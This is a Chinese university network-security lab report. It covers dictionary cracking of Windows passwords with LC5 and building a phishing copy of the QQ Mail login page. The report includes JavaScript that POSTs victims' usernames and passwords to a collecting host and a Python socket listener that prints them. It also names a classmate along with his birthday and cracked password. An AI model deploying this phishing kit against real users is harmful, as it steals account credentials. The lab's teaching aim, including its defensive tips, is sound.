网络安全实验1——口令攻击和钓鱼攻击
实验说明
口令攻击和钓鱼攻击是生活中两种较为常见的攻击方式,通过对攻击过程的复现,能够让学生对其有直观的认识,进而思考相应的防范措施。
实验目的
- 能够了解实验规范和实验所需的编程环境
- 能够理解社会工程学在口令攻击中的作用,掌握设计安全口令的方法
- 能够掌握钓鱼攻击技术和相应的防范手段
- 培养公民意识,提高社会责任感,积极向社会普及信息安全知识
实验原理
课程第 2 讲可用性和心理学
实验环境
Windows 桌面系统,Visual Studio 6.0 及以上版本
实验内容
(1)Windows 口令破解
(2)QQ 邮箱的钓鱼攻击
练习 1 Windows 口令破解
字典破解是口令攻击的一种常用方式,是指破解者通过对用户的了解,猜测其可能使用某些信息作为密码,例如其姓名、生日、电话号码等,同时结合对密码长度的猜测,利用工具来生成密码破解字典。
基本操作
实验平台–> 主机安全–> 实验 2 口令 破解–> 练习 1 Windows 口令
(1)两人一组,相互为对方计算机新增账户并设置密码,并向对方提供一定的提示信息。为了达到实验效果,用户口令不要设置得过于复杂。
(2)根据对方所给的提示,并结合自己日常的了解猜测可能设置的密码,生成密码字典。
(3)进入实验平台,单击工具栏“字典生成器”按钮,启动“字典生成器”。选择“生日”标签页,输入的年份与月份信息应尽量包含步骤(1) 中用到的生日日期,在“生成字典”标签页中确定字典文件存放的路径以及新用户口令位数,最后生成字典文件。
(4)单击工具栏“LC5”按钮,启动 LC5 口令破解工具。选择“Session”(会话)|“Session Options…”(会话选项)菜单项,在弹出的“Auditing Options For This Session”对话框中选中“Dictionary Crack”项的“Enabled”,取消其它项的“Enabled”。
单击“Dictionary List”(字典列表)按钮,导入步骤(2) 中生成的字典文件。返回 LC5 主界面,选择“Session”|“Import…”(导入)菜单项,在弹出的“Import”对话框中导入本地用户列表,选择“Session”|“Begin Audit”(开始审计)菜单项,开始字典破解用户口令。
设置密码
我的队友是张庚辰同学,他的生日是2000-7-21
设置生日并导出密码文件,改后缀为.dic
破解成功,显示密码为zgc0721
思考与总结
总结设计安全口令的因素,以及应如何设计安全的口令。
避开生日等个人信息
使用 大小写字母+数字+符号 的混合密码 如
6P9N>j(F9D8[D)qD
或者{6p$4Mcy}VCu83c*
符号大小写字母数字要混在一起
不要将密码写在纸/本子上
练习 2 QQ 邮箱的钓鱼攻击
从社会工程学的角度来说,往往由于用户的疏忽大意,不小心访问了错误的网站,而该网站的页面与正常网站并无差别,用户在输入个人私密信息后,用户的敏感信息便被非法的窃取。
构造 钓鱼 页面
打开 https://mail.qq.com/,右键快捷菜单保存 QQ 邮箱首页,保存网页的全部内容
用文本编辑器打开文件夹中的
xlogin.html
文件,定位到登录按钮(login_button
)代码处,为其添加单击事件。同时,在
响应函数
function saveAccount(){var user=document.getElementById("u").value;var passwd=document.getElementById("p").value;var httpRequest=new XMLHttpRequest();httpRequest.open('POST','http://192.168.43.51:8080',true);httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");httpRequest.send("user="+user+'&pwd='+passwd);}
接收钓鱼所得的账号和密码
# -*- coding: UTF-8 -*-
from socket import * # 导入 socket 模块
import sys
host ='192.168.43.51'#ip地址
port=8080#端口
bufsize=1024addr=(host,port)
sock=socket(AF_INET,SOCK_STREAM)#创建流式套接字
sock.bind(addr)#绑定套接字
sock.listen(5)#监听while True:AcceptSocket,AcceptAddr=sock.accept()#接收的套接字print("连接成功,客户端地址为:",AcceptAddr)data=AcceptSocket.recv(bufsize)#接受的数据print(data.decode())#将数据进行解码AcceptSocket.close()sock.close()
sys.exit(0)
实验验证
运行程序,打开在本地保存的网页,输入账号密码,程序运行截图如下:
思考与总结
钓鱼攻击
- 钓鱼式攻击,是通过伪装成他人以获得如用户名、密码、资金和身份证等个人敏感信息的犯罪诈骗过程。这些通信都声称(自己)来自官方、运营、客服或是网络管理者,以此来诱骗获取受害人的轻信。
- 黑客可以克隆⼀个与银行网站⼀模一样的网站,然后使用⼀些电脑病毒程序、垃圾软件等将假网站地址发送到客户的电脑上,或放在搜索网站上诱骗用户登录,以窃取⽤用户账号密码、交易信息或资金等。
防钓鱼
- 不打开不可信的链接地址,不要在来路不明的网站上输入账号密码以及个人信息,以免被钓鱼网站或网络木马等窃取;
- 安装杀毒软件,定期对电脑和⼿机进行杀毒;
- 按时更新系统补丁;
- 不将官方发送的验证码给其他人;
网络安全实验1——口令攻击和钓鱼攻击相关推荐
- 网络安全 顶级进行鱼叉式钓鱼攻击?手把手教学
网络安全!顶级大佬进行鱼叉式钓鱼攻击?手把手教学 关于红队在渗透测试中使用的网络钓鱼攻击的文章很多,不过大多数的介绍都是不完整的. 在本文中,我们将对这个话题进行一次完整的梳理,包括域创建,制作网络钓 ...
- AI+网络安全 让鱼叉式网络钓鱼攻击无所遁形
2017年是网络攻击极其活跃的一年,全球先后发生了多起大型网络攻击事件,例如令人震惊的Wanna Cry勒索病毒席卷全球,包括中国在内的150多个国家受到网络攻击.各国企业.学校.医院等机构无一幸免, ...
- 网络安全实验:CCProxy缓冲区溢出攻击
CCProxy缓冲区溢出实验 一.实验环境说明 溢出对象:CCProxy(一款代理服务器软件,支持FTP和Telnet) 调试工具:CDB.WinDbg.OllyDBG.IDA Pro etc 实验环 ...
- 网络安全实验之《ARP欺骗攻击》实验报告
一.实验目的 (1)课上实验(ARP欺骗攻击工具实验):运行WinArpAttacker或Ettercap(二选一),通过WireShark等抓包工具,捕获ARP欺骗攻击的数据包,分析ARP攻击的原理 ...
- 网络安全!顶级大佬进行鱼叉式钓鱼攻击?手把手教学
网络安全!顶级大佬进行鱼叉式钓鱼攻击?手把手教学 关于红队在渗透测试中使用的网络钓鱼攻击的文章很多,不过大多数的介绍都是不完整的. 在本文中,我们将对这个话题进行一次完整的梳理,包括域创建,制作网络钓 ...
- 黑客瞄准韩国智库、2021年社交媒体网络钓鱼攻击猛增|11月12日全球网络安全热点
安全资讯报告 勒索软件团伙使用"无情"的策略,以获得更大的回报 根据欧洲执法机构欧洲刑警组织的数据,仅在2019年至2020年之间,赎金支付的数量就增加了300%.网络犯罪分子以供 ...
- 如何使用setoolkit实施钓鱼攻击
前言 当我们在访问一个网站的时候,可能偶尔会遇到这样的情况,打开网页,并没有发现什么异常,但是当我们在网页表单中输入用户名和密码等信息然后点击登录按钮进行数据提交的时候,发现页面突然闪了一下,并且页面 ...
- 网络钓鱼大讲堂 Part4 | 网络钓鱼攻击战术
要防护网络钓鱼攻击并制定相应计划,深入了解攻击者很关键,需要更多地了解此类攻击过程,包括从初始计划及准备阶段到钓鱼网络如何协助攻击发生,再到提交诱饵并收集数据 这些信息不仅可以帮助企业和组织对不可避免 ...
- 与 Netcraft 携手为 GlobalSign 的客户提供先进的保护措施以防止网站遭受恶意入侵和钓鱼攻击...
2019独角兽企业重金招聘Python工程师标准>>> Netcraft 反钓鱼系统支持最主流浏览器,如果安裝 GlobalSign 数字证书的网站正遭受钓鱼攻击,Netcraft ...
- Radware:防御现代鱼叉式网络钓鱼攻击的方法
在网络安全领域工作的人都知道,网络钓鱼攻击,特别是针对大型企业的网络钓鱼攻击正在崛起.由于攻击依赖的是任何可利用的人为因素,因此,攻击者对这类攻击十分青睐. 多年以来,网络钓鱼攻击在不断地发展,而在过 ...
最新文章
- python安装pip-python2.7 安装pip的方法步骤(管用)
- 一步步编写操作系统(1)
- IIS问题解决之——无法访问数据库
- rabbitmq-5-案例2-简单的案例+exchange
- 洛谷 4115 Qtree4——链分治
- [JavaWeb-Servlet]概述与快速入门
- 无需复杂插件即可从Eclipse启动和调试Tomcat
- Android学习笔记---24_网络通信之网页源码查看器
- python的官网都打不开了-安装的python为什么打不开
- java 封闭类型_java – 如何获取封闭类?
- python画图代码大全-python 画图示例源码(Turtle Graphics)
- Installshield如何实现升级覆盖文件
- STM32—驱动RFID-RC522模块
- NR的SSB子载波间隔讨论——为何无60kHz
- 抖音快手YY西瓜斗鱼花椒虎牙等直播平台实时录制
- 怎么计算中国股市分红最高的股票?什么是股息率?--使用python和tushare获取分红最高的股票
- 华为路由器开启ftp出现530错误
- 浅析Fusion-IO和Intel SSD
- XP系统上出现的“你可能是盗版软件受害者”的解决方法
- poco mysql 库_支持POCO C库中的MySQL时间戳